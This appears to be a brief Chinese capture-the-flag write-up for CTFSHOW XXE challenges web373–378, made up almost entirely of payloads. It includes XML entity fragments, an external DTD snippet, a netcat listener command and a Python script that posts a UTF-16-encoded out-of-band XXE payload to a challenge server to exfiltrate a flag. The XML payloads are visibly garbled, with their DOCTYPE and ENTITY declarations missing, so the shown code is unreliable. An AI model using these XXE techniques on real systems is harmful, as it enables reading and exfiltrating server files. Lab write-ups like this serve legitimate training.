CTFSHOW xxe篇

文章目录

    • web373
    • web374、375、376
    • web377
    • web378不会

web373

payload


]>

&xxe;

web374、375、376

payload



%aaa;
]>
123

test.dtd

 ">
%dtd;
%xxe;

服务器开启监听 nc -lvp 9999

web377

payload

import requests

url = 'http://ddca1082-2f62-4f7f-b8b1-e369e33aa168.chall.ctf.show/'
payload = """

%aaa;
]>
123"""
payload = payload.encode('utf-16')
requests.post(url ,data=payload)

开监听拿flag

web378不会

你可能感兴趣的:(CTFSHOW xxe篇)